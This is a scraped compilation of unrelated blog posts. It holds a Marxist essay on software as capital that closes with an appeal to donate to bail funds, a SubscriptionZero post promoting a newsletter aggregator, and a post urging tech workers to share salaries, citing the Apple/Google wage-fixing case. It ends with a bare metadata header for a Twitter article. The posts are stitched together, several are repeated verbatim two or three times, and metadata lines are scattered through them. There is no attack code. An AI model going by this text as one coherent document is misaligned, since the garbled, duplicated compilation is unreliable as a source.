But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
I don’t know :)
Consider donating to a local community bail fund. Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
Computers were supposed to be “ a bicycle for our minds”, machines that operated faster than the speed of thought. And if the computer was a bicycle for the mind, then the plural form of computer, Internet, was a “ new home of Mind.” The Internet was a fantastic assemblage of all the world’s knowledge, and it was a bastion of freedom that would make time, space, and geopolitics irrelevant. Ignorance, authoritarianism, and scarcity would be relics of the meatspace past.
Things didn’t quite turn out that way. The magic disappeared and our optimism has since faded. Our websites are slow and insecure; our startups are creepy and unprofitable; our president Tweets hate speech; we don’t trust our social media apps, webcams, or voting machines. And in the era of coronavirus quarantining, we’re realizing just how inadequate the Internet turned out to be as a home of Mind. Where did it all go wrong?
SnvvSnvvSnvv/Shutterstock.com
Software is for people
Software is at once a field of study, an industry, a career, a process of production, and a process of consumption—and only then a body of computer code. It is impossible to separate software from the human and historical context that it is situated in. Code is always addressed to someone. As Structure and Interpretation of Computer Programs puts it, “programs must be written for people to read, and only incidentally for machines to execute” (Abelson et al. 1996). We do not write code for our computers, but rather we write it for humans to read and use. And even the purest, most theoretical and impractical computer science research has as its aim to provoke new patterns of thought in human readers and scholars—and these are formulated using the human-constructed tools of mathematics, language, and code.
As software engineers, we pride ourselves in writing “readable” or “clean” code, or code that “solves business problems”—synonyms for this property of addressivity that software seems to have. Perhaps the malware author knows this property best. Like any software, malware is addressed to people, and only incidentally for machines to execute. Whether a sample of malware steals money, hijacks social media accounts, or destabilizes governments, it operates in the human domain. The computer does not care about money, social media accounts, or governments; humans do. And when the malware author obfuscates their code, they do so with a human reader in mind. The computer does not care whether the code it executes is obfuscated; it only knows opcodes, clocks, and interrupts, and churns through them faithfully. Therefore, even malware—especially malware—whose code is deliberately made unreadable, is written with the intention of being read.
Code is multivoiced
Soviet philosopher Mikhail Bakhtin wrote that “the single utterance, with all its individuality and creativity, can in no way be regarded as a completely free combination of forms of language … the word in language is half someone else’s” (Wertsch 1991, 58-59). Any code that we write, no matter how experimental or novel, owes a piece of its existence to someone else, and participates as a link in a chain of dialogue, one in reply to another. The malware author is in dialogue with the malware analyst. The software engineer is in dialogue with their teammates. The user of a piece of software is in dialogue with its creator. A web application is in dialogue with the language and framework it is written in, and its structure is mediated by the characteristics of TCP/IP and HTTP. And in the physical act of writing code, we are in dialogue with our computer and development environment.
Wertsch formulated Bakhtin’s notion of dialogues in terms of voices: “Who is doing the talking?,” he asks—“At least two voices” (1991, 63). While Wertsch and Bakhtin were concerned with human language, we can just as readily apply their insights to software: “the ambiguity of human language is present in code, which never fully escapes its status as human writing, even when machine-generated. We bring to code our excesses of language, and an ambiguity of semantics, as discerned by the human reader” (Temkin 2017). Whose voices do we hear when we experience code?
At the syntactic level, every keyword and language feature we use is rented from the creators of the language. These keywords and grammars are themselves often rented from a human language like English, and these voices too are present in our code. The JavaScript if rents meaning from the English “if,” which is itself rented from German, and in any case, the word does not belong to us, not fully—the word in language is half someone else’s. When we call programming languages, libraries, and frameworks “opinionated” or “ pits of despair/success,” we really mean “how loud is the voice of the language in our code?” A comment on the Go programming language by matt_wulfeck on Hacker News illuminates the intentional imbalance between the voice of the programmer and the voice of the language:
Go takes away so much “individuality” of code. On most teams I’ve been on with Python and Java I can open up a file and immediate tell who wrote the library based on various style and other such. It’s a lot harder with Go and that’s a very good thing.
Here we see the way in which voices mediate our action—how does Go mediate the way in which we write and think about code? Jussi Pakkanen, creator of the Meson build system, called the mediating aspect of voices shepherding: “It’s not what programming languages do, it’s what they shepherd you to.” Shepherding, or mediational means, are “an invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered ‘better’ in some sense” (Pakkanen 2020). We internalize the voices of our social relations, and these voices mediate or shepherd our action. Every time we dive into a codebase, speak with a mentor, take a course, or watch a conference talk, we are deliberately adding new voices to the little bag of voices in our mind. This is not purely a process of consumption: in internalizing voices, we form counter-words, mentally argue with them, and ventriloquize them through our own work—in a word, we engage in a dialogue.
Next time you settle down to read some code, listen carefully for the voices inside the code and the voices inside your mind, however faint they sound. I can hear the voice of a senior engineer from my last job every time I write a type definition.
Abstraction and labor
At a higher level, the patterns and strategies we use to structure our code, which we think of as independent of programming languages, such as algorithms, design patterns, architectures, and paradigms, are rented too. Some algorithms are named after famous computer scientists like Dijkstra, Kruskal, and Prim, and these clue us into the rich ensemble of voices speaking in our code. But at the same time, the process of naming obscures the multitude of other voices speaking through these algorithms. Dijkstra’s algorithm is a weighted breadth-first search that uses a priority queue—but the name alone would not tell you this, and in fact, the names “breadth-first search” and “priority queue” obscure still more voices. By attributing the entire history, the chains of dialogue, and the chorus of voices that speak in the algorithm, all to that single name Dijkstra—by seeing one where there are many—they are killed, and the signifier Dijkstra takes their place. This is the process of abstraction.
These obscured chains of dialogue are present in everything, from supply chains, to APIs, source code, and package managers. Run git log in a repository from work, or browse the commits of an open source project—try Postgres if you don’t have one handy. Read the commit messages, puzzle over the diffs, and marvel at the layers of sedimented history. Postgres has nearly 50,000 commits, one in reply to another, each representing hours or days of labor, and lifetimes of accumulated knowledge and experience. It is a recording surface for these dialogues, in which each commit is inscribed; and it is at the level of commits, changelists, and releases that we tame the continuous flow of development by cutting into, segmenting, and abstracting it into units that we can comprehend. One voice at a time, please. One spokesman Dijkstra, one mascot Postgres to hide the complexity.
Every piece of software that we interact with, every company, every project, every product—from your computer’s operating system, to the SaaS vendors your company relies on, the libraries you use, and the routines running on the microcontroller in your refrigerator, hides just as delightfully complicated of a history of production, and this is what brings all of software development together. Marx described this common substance “a mere congelation of homogeneous human labour, of labour power expended without regard to the mode of its expenditure. All that these things now tell us is, that human labour power has been expended in their production, that human labour is embodied in them. When looked at as crystals of this social substance, common to them all, they are—Values” (1867, 48).
NPM is not the problem
In 2016, a JavaScript package called left-pad broke the Internet for a day. The package consisted of eleven lines of code that padded strings to a specified length, turning strings like “5” into strings like “005.” Out of protest over a trademark dispute, left-pad’s creator Azer Koçulu deleted it from the NPM registry, wreaking havoc on an entire ecosystem of packages that depended on it, whether directly or indirectly through transitive dependencies to the nth degree—and these were packages that powered thousands of websites around the world (Williams 2016).
A visualization of the dependency graph for the react-scripts NPM package. Each dot represents a package, and lines connect packages that depend on one another. One of the dots is left-pad; I don’t know which.
According to the discourse at the time, this was a lesson on the fragility of the webs of dependencies and abstractions that we had created, and it was a sign that the NPM ecosystem was fundamentally broken. We had built houses of cards—long chains of dialogue whose links could simply vanish—and all it took was a single developer and his eleven lines of code to tear them down. David Haney, meditating on the left-pad incident, asked in a blog post
Have We Forgotten How To Program? […] I get the impression that the NPM ecosystem participants have created a penchant for micro-packages. Rather than write any functions or code, it seems that they prefer to depend on something that someone else has written (2016).
But we know by now that we have not forgotten how to program: this is how we have always programmed. Everything we write is something that someone else has written; nothing belongs to us; all code is multi-voiced. These webs of dependencies have always existed, but perhaps no system had made the fact quite so obvious as NPM did. Where we see one—one app, one script, one package—the breakages of NPM remind us that there are many.
Software is not creative
Watch as a neural network, initialized from random chaos, trains itself to play Atari Breakout. Watch the tiny machines—the nodes of the network, their connections and conjunctions, break-flows and back-propagations—and watch them converge: at first random contingencies that, in a feedback loop, crystallize into structure. These are machines reproducing machines. These are tiny capitalists. “Universal history is the history of contingencies, and not the history of necessity. Ruptures and limits, and not continuity” (Deleuze & Guattari 1983, 140).
But neural networks, and software in general, do not create new reality—they ingest data and reflect back a reality that is a regurgitation and reconfiguration of what they have already consumed. And this reality that these machines reflect back is slightly wrong. Recall the statistician’s aphorism “all models are wrong, but some are useful.” What happens when we rely on these models to produce new realities, and feed those slightly-wrong realities back into the machines again? What happens when we listen to Spotify’s Discover Weekly playlist week after week, “like” the posts that Facebook recommends to us, and scroll through TikTok after TikTok? I am guilty of all of these, and it would not be wrong to claim that my taste in music and sense of humor are mediated by this mutual recursion between the algorithms and the real world.
And that is exactly it: in the modern world, our social interactions, our devices, governments, and markets, are circulations and flows of the same realities under the same rules. Our software creates new problems—problems that we’ve never had before, like fake news, cyberbullying, and security vulnerabilities—and we patch them over with yet more layers of code. Software becomes quasi-cause of software. These are echoes of the same voices in a positive feedback loop, growing louder and less coherent with each cycle—garbage in, garbage out, a thousand times over.
Who does software benefit?
For many of us fortunate enough to stay home during the coronavirus outbreak, our only interface with the world outside our families and homes—the relays of connection between us, our families, communities and societies—have been filtered through our screens and earbuds. It is apparent now more than ever exactly what software does for us, and what kinds of inequalities it reinforces.
Through Instacart, Amazon Fresh, and other grocery delivery services, we can use an app to purchase a delivery driver’s body for an hour to expose themself to the virus on our behalf. Unsatisfied with even this, some developers have written scripts to instantly reserve the scarce delivery slots on these services.
One developer wrote to Vice’s Motherboard “I designed the bot for those who find it extremely inconvenient in these times to step out, or find it not safe for themselves to be outside. It is my contribution to help flatten the curve, I really hope this’ll help reduce the number of people going out” (Cox 2020). Is that right? Does a bot really reduce the number of people going out, or does it merely change the demographics of who gets to stay home, favoring those with the resources and technical skills to run a Python script and Selenium WebDriver? With a constant and limited number of delivery slots, Joseph Cox points out that these bots create “a tech divide between those who can use a bot to order their food and those who just have to keep trying during the pandemic” (2020).
Instacart bots are just the most recent reincarnation of a long tradition of using the speed of software to gain an edge against humans. In the 2000’s, when concert tickets first started to sell over the Internet, scalpers built bots to automatically purchase tickets to resell them at a higher price. And capitalism, in its infinite flexibility, adapted and welcomed this development with open arms and invisible hands, spawning companies like TicketMaster, which institutionalized and legitimized the practice. But Instacart and TicketMaster are mere symptoms of the problem. We saw the same patterns in the arms race of high-frequency trading. At first, the robots beat the humans. Next, the robots became part of the game, and the robots played against each other. The profits from high-frequency trading dried up, and yet using it became a necessity just to keep up.
These examples give us a decent idea of what software is good for. On its own, it never enables anything truly new, but rather changes the constant factors of speed and marginal cost, and raises the barrier for participation arbitrarily high. Once the software train begins to leave the station, we have no choice but to jump and hang on, lest we get run over or left behind—and we are not sure which is worse. Max Weber, studying the development of capitalism, identified this secularizing, spiralling effect:
The Puritan wanted to be a person with a vocational calling; we must be. For to the extent that asceticism moved out of the monastic cell and was carried over into the life of work in a vocational calling, and then commenced to rule over this-worldly morality, it helped to do its part to build the mighty cosmos of the modern economic order. This economy is bound to the technical and economic conditions of mechanized, machine-based production. (Weber 1920, 177)
A false start: startups
Startups love to save the world, but look at the state of the world now—is this what it’s like to be saved? Is the world even a little bit better because of startups like Instagram, Uber, and Peloton? Startups are spaces of remarkable innovation, and they are experts at channeling the multivoicedness of code—just look at the network of voices that GitLab channels (visualized below). But under capitalism, these voices are distorted and constrained, and they cry “growth, growth!” as venture capitalists and founders demand user acquisition, market share, and revenue—in a word, they demand access to capitalist accumulation.
Systems diagram published by GitLab
The startup founder, no matter how much they claim to love code, love humanity, or love the thrill of the hustle (and they may even believe themself when they say it), loves the growth of capital most of all. The tech founder is a capitalist proper, but capital does not love them back; capital cannot love at all, and the odds are stacked against our hero capitalist. “The larger capitals beat the smaller … It always ends in the ruin of many small capitalists, whose capitals partly pass into the hands of their conquerors, partly vanish” (Marx 1867, 621). Capital accumulates and concentrates, and in the midst of frothy competition, the startup either dies or gets acquired by Facebook or Google, leaving nothing behind but a bullet point on LinkedIn and a blog post signifying an incredible journey. So much for changing the world.
What is to be done?
To revisit that ambitious question we set out to answer, where did it all go wrong? What got us into this mess, this tool-assisted speedrun of accumulation and exploitation? The trick is that we have not been studying software on its own—we’ve established that computers and computer code are veritably saturated with human touch, human voices, and human thought. Software cannot be divorced from the human structures that create it, and for us, that structure is capitalism. To quote Godfrey Reggio, director of Koyaanisqatsi (1982), “it’s not the effect of, it’s that everything exists within. It’s not that we use technology, we live technology. Technology has become as ubiquitous as the air we breathe, so we are no longer conscious of its presence” (Essence of Life 2002).
Where did it all go wrong? At some point, capital became the answer to every question—what to produce, how to produce, for whom to produce, and why. When software, that ultimate solution in search of a problem, found the questions answered only by capital, we lost our way, caught in capital’s snare.
Q: What does software do?
A: It produces and reproduces capital.
Q: Who does software benefit?
A: People who own capital.
Q: What is software?
A: Capital.
A: Capital.
A: Capital.
A: Capital.
But we can break this pattern; we can find our own answers to those questions, and if it’s up to us, the answer does not need to be that answer we’ve been taught, capital. Software is a tool with revolutionary potential, but that is the extent of what it can give us. “Science demonstrates by its very method that the means that it constantly elaborates do no more than reproduce, on the outside, an interplay of forces by themselves without aim or end whose combinations obtain such and such a result” (Deleuze & Guattari 1983, 368).
So, what are the aims and ends that we should direct our software toward? What are the answers to those economic questions, if not capital—or better yet, what questions should we be asking, if not economic?
Protesters across the nation are directly fighting the oppressive structures outlined in this post. Your money will pay for legal aid and bail for people who have been arrested for standing up to police brutality, institutional racism, and the murder of Black men and women like George Floyd, Breonna Taylor, Ahmaud Arbery, and Nina Pop.
At the moment, this is the most efficient means of converting your capital into freedom. If software is good for anything, this is it.
title: On building a newsletter aggregator - SubscriptionZero Blog
title: On building a newsletter aggregator description: A newsletter aggregator allows you to combine your newsletters so you can read them all in one place. image: https://blog.subscriptionzero.com/wp-content/uploads/2020/06/3646374-1024x683.jpg
description: A newsletter aggregator allows you to combine your newsletters so you can read them all in one place. image: https://blog.subscriptionzero.com/wp-content/uploads/2020/06/3646374-1024x683.jpg title: On building a newsletter aggregator - SubscriptionZero Blog
Newsletters are great for keeping up with what’s happening around you. Their authors do a fantastic job of curating hours of reading material into a well-written digest. However, for readers, consuming newsletters is still not ideal! In this post, I’ll expose a solution that I think will benefit both readers and authors. It’s called newsletter aggregator.
The problem with newsletters
I recently subscribed to Trends.vc. The author spends around 30 hours every week on research and comes up with a report about market trends in the startup world. To top it all, it’s written in an extremely simple and concise English.
But here’s the thing, none of my friends are subscribed to it. Why? Because signing up to a newsletter means giving out your personal email. That’s a big friction!
First, you’re giving away everything that’s tied to your email. There are lots of tools out there that will build your full persona from your email. So you’re not just giving out an email address.
Second, test driving a newsletter is very demanding. You sign up, wait for the confirmation, wait for the first email, wait for the second one and only then decide if you like it or not. That’s easily a 2 week trial!
But more importantly, for 2 weeks you’ve been receiving something you didn’t want on top of your important emails. That’s an enormous investment for a trial.
Third, newsletters land in your mailbox. So by definition, they are fighting – even unwillingly – for a place on top of your important emails. For as long as you’re subscribed!
Newsletters, then, have incredible value. Their distribution, however, is lacking.
So how can we fix that?
To start with, inboxes could get better at sorting emails. But that’s a lot harder than it sounds.
Newsletters could also choose another medium for distribution. The problem here is that email is the best distribution. Nothing beats a place in your audience’s mailbox.
There is however, another solution that has been getting quite some attention lately. You’ve probably heard that term thrown here and there: newsletter aggregator.
Enter the newsletter aggregator
The term newsletter aggregator isn’t well defined yet. But I’d like to start officializing it. To me a newsletter aggregator needs to do few things
Bypass your mailbox (for the sake of decluttering)
Combine newsletters from different senders
Categorize newsletters
Send email updates on a regular basis (weekly, daily or every X days)
Bonus: provide a better interface for reading newsletters
This is still early so the list will grow as newsletter aggregator apps mature. I sincerely believe we are at the dawn of a new era with newsletter aggregators.
And I’m excited to be part of it. For the past year, I’ve been building SubscriptionZero which is aiming to solve this very problem.
SubscriptionZero allows you to read and organize your newsletters outside your mailbox. When you login, you’ll receive an email address that you can then use to subscribe to newsletters. These will then appear on the app’s reader which is specifically designed to read newsletters.
It solves the 3 problems I mentioned above:
You don’t hand out your personal email
You don’t have unwanted emails fighting for the top spot in your inbox
You don’t have newsletters you actually like fighting for the top spot in your mailbox
Newsletters are great for keeping up with what’s happening around you. Their authors do a fantastic job of curating hours of reading material into a well-written digest. However, for readers, consuming newsletters is still not ideal! In this post, I’ll expose a solution that I think will benefit both readers and authors. It’s called newsletter aggregator.
The problem with newsletters
I recently subscribed to Trends.vc. The author spends around 30 hours every week on research and comes up with a report about market trends in the startup world. To top it all, it’s written in an extremely simple and concise English.
But here’s the thing, none of my friends are subscribed to it. Why? Because signing up to a newsletter means giving out your personal email. That’s a big friction!
First, you’re giving away everything that’s tied to your email. There are lots of tools out there that will build your full persona from your email. So you’re not just giving out an email address.
Second, test driving a newsletter is very demanding. You sign up, wait for the confirmation, wait for the first email, wait for the second one and only then decide if you like it or not. That’s easily a 2 week trial!
But more importantly, for 2 weeks you’ve been receiving something you didn’t want on top of your important emails. That’s an enormous investment for a trial.
Third, newsletters land in your mailbox. So by definition, they are fighting – even unwillingly – for a place on top of your important emails. For as long as you’re subscribed!
Newsletters, then, have incredible value. Their distribution, however, is lacking.
So how can we fix that?
To start with, inboxes could get better at sorting emails. But that’s a lot harder than it sounds.
Newsletters could also choose another medium for distribution. The problem here is that email is the best distribution. Nothing beats a place in your audience’s mailbox.
There is however, another solution that has been getting quite some attention lately. You’ve probably heard that term thrown here and there: newsletter aggregator.
Enter the newsletter aggregator
The term newsletter aggregator isn’t well defined yet. But I’d like to start officializing it. To me a newsletter aggregator needs to do few things
Bypass your mailbox (for the sake of decluttering)
Combine newsletters from different senders
Categorize newsletters
Send email updates on a regular basis (weekly, daily or every X days)
Bonus: provide a better interface for reading newsletters
This is still early so the list will grow as newsletter aggregator apps mature. I sincerely believe we are at the dawn of a new era with newsletter aggregators.
And I’m excited to be part of it. For the past year, I’ve been building SubscriptionZero which is aiming to solve this very problem.
SubscriptionZero allows you to read and organize your newsletters outside your mailbox. When you login, you’ll receive an email address that you can then use to subscribe to newsletters. These will then appear on the app’s reader which is specifically designed to read newsletters.
It solves the 3 problems I mentioned above:
You don’t hand out your personal email
You don’t have unwanted emails fighting for the top spot in your inbox
You don’t have newsletters you actually like fighting for the top spot in your mailbox
Newsletters are great for keeping up with what’s happening around you. Their authors do a fantastic job of curating hours of reading material into a well-written digest. However, for readers, consuming newsletters is still not ideal! In this post, I’ll expose a solution that I think will benefit both readers and authors. It’s called newsletter aggregator.
The problem with newsletters
I recently subscribed to Trends.vc. The author spends around 30 hours every week on research and comes up with a report about market trends in the startup world. To top it all, it’s written in an extremely simple and concise English.
But here’s the thing, none of my friends are subscribed to it. Why? Because signing up to a newsletter means giving out your personal email. That’s a big friction!
First, you’re giving away everything that’s tied to your email. There are lots of tools out there that will build your full persona from your email. So you’re not just giving out an email address.
Second, test driving a newsletter is very demanding. You sign up, wait for the confirmation, wait for the first email, wait for the second one and only then decide if you like it or not. That’s easily a 2 week trial!
But more importantly, for 2 weeks you’ve been receiving something you didn’t want on top of your important emails. That’s an enormous investment for a trial.
Third, newsletters land in your mailbox. So by definition, they are fighting – even unwillingly – for a place on top of your important emails. For as long as you’re subscribed!
Newsletters, then, have incredible value. Their distribution, however, is lacking.
So how can we fix that?
To start with, inboxes could get better at sorting emails. But that’s a lot harder than it sounds.
Newsletters could also choose another medium for distribution. The problem here is that email is the best distribution. Nothing beats a place in your audience’s mailbox.
There is however, another solution that has been getting quite some attention lately. You’ve probably heard that term thrown here and there: newsletter aggregator.
Enter the newsletter aggregator
The term newsletter aggregator isn’t well defined yet. But I’d like to start officializing it. To me a newsletter aggregator needs to do few things
Bypass your mailbox (for the sake of decluttering)
Combine newsletters from different senders
Categorize newsletters
Send email updates on a regular basis (weekly, daily or every X days)
Bonus: provide a better interface for reading newsletters
This is still early so the list will grow as newsletter aggregator apps mature. I sincerely believe we are at the dawn of a new era with newsletter aggregators.
And I’m excited to be part of it. For the past year, I’ve been building SubscriptionZero which is aiming to solve this very problem.
SubscriptionZero allows you to read and organize your newsletters outside your mailbox. When you login, you’ll receive an email address that you can then use to subscribe to newsletters. These will then appear on the app’s reader which is specifically designed to read newsletters.
It solves the 3 problems I mentioned above:
You don’t hand out your personal email
You don’t have unwanted emails fighting for the top spot in your inbox
You don’t have newsletters you actually like fighting for the top spot in your mailbox
title: Why talk about compensation? description: There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was…
title: Why talk about compensation?
There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was some backlash1 , saying that people sharing their salaries is basically just flexing, and instead of bragging on Twitter, people should just go out and do something that actually helps, like unionizing.
While I don't think that the current iteration of people sharing their salaries on Twitter is as useful as it could be, I think that it's incredibly important for people to talk about their pay, and I want to tell you a few stories about why. To start with, we'll have to go back a decade - a group of employees of tech companies including Google, Apple, and Intel filed a class action lawsuit, stating that their employers colluded in a wage-fixing agreement to keep salaries down.
Steve Jobs was at the source of much of the wage-fixing, becoming angry when companies hired Apple employees - he wrote to Google co-founder Sergey Brin regarding the Safari team:
if you hire a single one of these people that means war.
When a Google employee referred an Apple employee for a job, Steve Jobs emailed Eric Schmidt, who responded by firing the Google employee who had sent the referral. Google's staffing director saying upon hearing about the situation that the employee "will be terminated within the hour," and to "Please extend my apologies as appropriate to Steve Jobs."
When Palm, Inc refused to participate in the wage-fixing agreement, Steve Jobs wrote:
This is not satisfactory to Apple.
I'm sure you realize the asymmetry in the financial resources of our respective companies when you say: "we will both just end up paying a lot of lawyers a lot of money."
My advice is to take a look at our patent portfolio before you make a final decision here.
A Senior Vice President at Google wrote about compensation that:
[The] long-term ... right approach is not to deal with these situations as one-offs but to have a systematic approach to compensation that makes it very difficult for anyone to get a better offer.
As a result of driving wages down for more than half a decade, the companies paid out around $3,840 to each affected employee. I'll let you do the math on that one.
So I think that it's obvious that employers have shown in interest in keeping salaries down, and one of the tools that is used to do that is making sure people don't have information about how much their coworkers are being paid. And while tech workers have it pretty good in terms of compensation (at least here in the States), the number of people I know who save their company tens or hundreds of millions of dollars, and as a reward are given raises less than a tenth of a percent of what they saved makes me think that it's worth talking about who's capturing the value of our labour.
But how we talk about our salaries matters - just knowing that other people are out there, making four or five times as much as you are doesn't help your situation much unless you're able to negotiate that raise for yourself.
A friend of mine recently learned that one of his coworkers made around 1.6x what he did. If the story ended there, it wouldn't be too interesting. But instead of just leaving for greener pastures, or negotiating a raise for himself, he started talking to his coworkers about how much they made. As it turned out, everyone except one person all made about the same amount - why was that person's work (doing the same work on the same project team) worth 60% more than everyone else's? Just a couple months after talking frankly about compensation, the highly-paid coworker and my friend negotiated for an extra week of vacation (not just for themselves, but for everyone at the company). And it's not just vacation - collectively, everyone at the company negotiated for oncall compensation as well. After talking to his coworkers about their compensation, and collectively bargaining for fairer compensation, my friend has now gone on to sign an offer at a different company for significantly more money - all because of open conversations about salary and working environments, and collective action to improve that for everyone.
By talking with our coworkers, being open about our salaries, and bargaining collectively, we can not just improve our own conditions, but also lift up everyone around us. People have fought and been killed for our right to openly discuss compensation, and I think it's worth exercising that right. So talk to your coworkers, and if you see me around the office or in person, know that I'm happy to talk about how much I'm paid and what I know about salary bands at any place I've worked.
By talking to your coworkers and building solidarity, we can build a fairer and better world together.
If you're in NYC and want to meet up over lunch/coffee to chat about the future of technology, get in touch with me.
There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was some backlash1 , saying that people sharing their salaries is basically just flexing, and instead of bragging on Twitter, people should just go out and do something that actually helps, like unionizing.
While I don't think that the current iteration of people sharing their salaries on Twitter is as useful as it could be, I think that it's incredibly important for people to talk about their pay, and I want to tell you a few stories about why. To start with, we'll have to go back a decade - a group of employees of tech companies including Google, Apple, and Intel filed a class action lawsuit, stating that their employers colluded in a wage-fixing agreement to keep salaries down.
Steve Jobs was at the source of much of the wage-fixing, becoming angry when companies hired Apple employees - he wrote to Google co-founder Sergey Brin regarding the Safari team:
if you hire a single one of these people that means war.
When a Google employee referred an Apple employee for a job, Steve Jobs emailed Eric Schmidt, who responded by firing the Google employee who had sent the referral. Google's staffing director saying upon hearing about the situation that the employee "will be terminated within the hour," and to "Please extend my apologies as appropriate to Steve Jobs."
When Palm, Inc refused to participate in the wage-fixing agreement, Steve Jobs wrote:
This is not satisfactory to Apple.
I'm sure you realize the asymmetry in the financial resources of our respective companies when you say: "we will both just end up paying a lot of lawyers a lot of money."
My advice is to take a look at our patent portfolio before you make a final decision here.
A Senior Vice President at Google wrote about compensation that:
[The] long-term ... right approach is not to deal with these situations as one-offs but to have a systematic approach to compensation that makes it very difficult for anyone to get a better offer.
As a result of driving wages down for more than half a decade, the companies paid out around $3,840 to each affected employee. I'll let you do the math on that one.
So I think that it's obvious that employers have shown in interest in keeping salaries down, and one of the tools that is used to do that is making sure people don't have information about how much their coworkers are being paid. And while tech workers have it pretty good in terms of compensation (at least here in the States), the number of people I know who save their company tens or hundreds of millions of dollars, and as a reward are given raises less than a tenth of a percent of what they saved makes me think that it's worth talking about who's capturing the value of our labour.
But how we talk about our salaries matters - just knowing that other people are out there, making four or five times as much as you are doesn't help your situation much unless you're able to negotiate that raise for yourself.
A friend of mine recently learned that one of his coworkers made around 1.6x what he did. If the story ended there, it wouldn't be too interesting. But instead of just leaving for greener pastures, or negotiating a raise for himself, he started talking to his coworkers about how much they made. As it turned out, everyone except one person all made about the same amount - why was that person's work (doing the same work on the same project team) worth 60% more than everyone else's? Just a couple months after talking frankly about compensation, the highly-paid coworker and my friend negotiated for an extra week of vacation (not just for themselves, but for everyone at the company). And it's not just vacation - collectively, everyone at the company negotiated for oncall compensation as well. After talking to his coworkers about their compensation, and collectively bargaining for fairer compensation, my friend has now gone on to sign an offer at a different company for significantly more money - all because of open conversations about salary and working environments, and collective action to improve that for everyone.
By talking with our coworkers, being open about our salaries, and bargaining collectively, we can not just improve our own conditions, but also lift up everyone around us. People have fought and been killed for our right to openly discuss compensation, and I think it's worth exercising that right. So talk to your coworkers, and if you see me around the office or in person, know that I'm happy to talk about how much I'm paid and what I know about salary bands at any place I've worked.
By talking to your coworkers and building solidarity, we can build a fairer and better world together.
If you're in NYC and want to meet up over lunch/coffee to chat about the future of technology, get in touch with me.
There's been some Twitter discourse about people working in tech sharing their salaries - it started with Zac Sweers, and many other people shared their compensation. As that was happening, there was some backlash1 , saying that people sharing their salaries is basically just flexing, and instead of bragging on Twitter, people should just go out and do something that actually helps, like unionizing.
While I don't think that the current iteration of people sharing their salaries on Twitter is as useful as it could be, I think that it's incredibly important for people to talk about their pay, and I want to tell you a few stories about why. To start with, we'll have to go back a decade - a group of employees of tech companies including Google, Apple, and Intel filed a class action lawsuit, stating that their employers colluded in a wage-fixing agreement to keep salaries down.
Steve Jobs was at the source of much of the wage-fixing, becoming angry when companies hired Apple employees - he wrote to Google co-founder Sergey Brin regarding the Safari team:
if you hire a single one of these people that means war.
When a Google employee referred an Apple employee for a job, Steve Jobs emailed Eric Schmidt, who responded by firing the Google employee who had sent the referral. Google's staffing director saying upon hearing about the situation that the employee "will be terminated within the hour," and to "Please extend my apologies as appropriate to Steve Jobs."
When Palm, Inc refused to participate in the wage-fixing agreement, Steve Jobs wrote:
This is not satisfactory to Apple.
I'm sure you realize the asymmetry in the financial resources of our respective companies when you say: "we will both just end up paying a lot of lawyers a lot of money."
My advice is to take a look at our patent portfolio before you make a final decision here.
A Senior Vice President at Google wrote about compensation that:
[The] long-term ... right approach is not to deal with these situations as one-offs but to have a systematic approach to compensation that makes it very difficult for anyone to get a better offer.
As a result of driving wages down for more than half a decade, the companies paid out around $3,840 to each affected employee. I'll let you do the math on that one.
So I think that it's obvious that employers have shown in interest in keeping salaries down, and one of the tools that is used to do that is making sure people don't have information about how much their coworkers are being paid. And while tech workers have it pretty good in terms of compensation (at least here in the States), the number of people I know who save their company tens or hundreds of millions of dollars, and as a reward are given raises less than a tenth of a percent of what they saved makes me think that it's worth talking about who's capturing the value of our labour.
But how we talk about our salaries matters - just knowing that other people are out there, making four or five times as much as you are doesn't help your situation much unless you're able to negotiate that raise for yourself.
A friend of mine recently learned that one of his coworkers made around 1.6x what he did. If the story ended there, it wouldn't be too interesting. But instead of just leaving for greener pastures, or negotiating a raise for himself, he started talking to his coworkers about how much they made. As it turned out, everyone except one person all made about the same amount - why was that person's work (doing the same work on the same project team) worth 60% more than everyone else's? Just a couple months after talking frankly about compensation, the highly-paid coworker and my friend negotiated for an extra week of vacation (not just for themselves, but for everyone at the company). And it's not just vacation - collectively, everyone at the company negotiated for oncall compensation as well. After talking to his coworkers about their compensation, and collectively bargaining for fairer compensation, my friend has now gone on to sign an offer at a different company for significantly more money - all because of open conversations about salary and working environments, and collective action to improve that for everyone.
By talking with our coworkers, being open about our salaries, and bargaining collectively, we can not just improve our own conditions, but also lift up everyone around us. People have fought and been killed for our right to openly discuss compensation, and I think it's worth exercising that right. So talk to your coworkers, and if you see me around the office or in person, know that I'm happy to talk about how much I'm paid and what I know about salary bands at any place I've worked.
By talking to your coworkers and building solidarity, we can build a fairer and better world together.
I'm not going to link any specific tweets, but I saw this from a few places. ↩
title: 7.5 Reasons Why Twitter Will Replace Your College Diploma — Brendan Cahill
title: 7.5 Reasons Why Twitter Will Replace Your College Diploma description: Brendan Cahill Jun 11 · 8 min read Why a strong Twitter presence might do more for your professional success than a college diploma will. But first — why Twitter? I wouldn’t say I am a Titan of… author: Brendan Cahill image: http://static1.squarespace.com/static/5e860d480e72f6236141f59a/5ee27ca405e3dd0d022caee9/5ee3a3c20c342a1acf777ad5/1591976971945/Screen+Shot+2020-06-10+at+12.54.04+PM.png?format=1500w
